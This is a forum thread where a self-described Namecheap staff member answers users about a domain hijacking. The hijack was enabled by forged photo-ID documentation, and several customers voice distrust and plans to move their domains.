Ross, I am new to the Namecheap family but I am staff. I am not sure how exactly to prove that here. :) I actually signed up here specifically to address this situation. Meanwhile, we are sorry to see you go but we understand, as well, and hope that we can, in some way, help elevate your concerns in the future and win you back.



Any chance you could explain this a bit further? Particularly the documentation part, I understand how easy it can be to fall for the first two... but I'm interested in how "documentation" was created that could look real enough to convince yourselves that we wanted the nameservers changed without proper authorization.

Like many others here, I have domains held with Namecheap and this whole situation has made me uneasy about keeping them with you.


For security reasons, I am not able to provide the exact details on what we look for, checks in place, etc. I can say we were provided with photo identification as part of the documentation. Knowing that this can be duplicated easier with today’s technology, we do have other checks in place. However, this is where the human error occurred and thus has been promptly dealt with, accordingly.

I do not wish to "hijack" this thread, but would like to say that if you have any questions or concerns about your own account or domains, please don’t hesitate to contact our support staff. They will help you both with your account and security in general.

Thanks,

Juliet

Ross, I am new to the Namecheap family but I am staff. I am not sure how exactly to prove that here. :) I actually signed up here specifically to address this situation. Meanwhile, we are sorry to see you go but we understand, as well, and hope that we can, in some way, help elevate your concerns in the future and win you back.





For security reasons, I am not able to provide the exact details on what we look for, checks in place, etc. I can say we were provided with photo identification as part of the documentation. Knowing that this can be duplicated easier with today’s technology, we do have other checks in place. However, this is where the human error occurred and thus has been promptly dealt with, accordingly.

I do not wish to "hijack" this thread, but would like to say that if you have any questions or concerns about your own account or domains, please don’t hesitate to contact our support staff. They will help you both with your account and security in general.

Thanks,

Juliet
Not going to lie, i found it a tad strange that this happened because about 2 years ago i tried to get on one of my old accounts on NameCheap called "SilverMerc" :P, Your staff told me the account didn't belong to me yet, i could easily proove all the details. Now i guess i know why your called NameCheap

Can you prove your NameCheap staff? or can any staff verify she is?

Never the less after this mistake your security sort of makes me feel un-easy, thus why i will be moving from NameCheap to GoDaddy in the next couple of days.
Ross
http://www.linkedin.com/in/julietmorris

http://www.linkedin.com/in/julietmorris

Mate we realised this ages ago...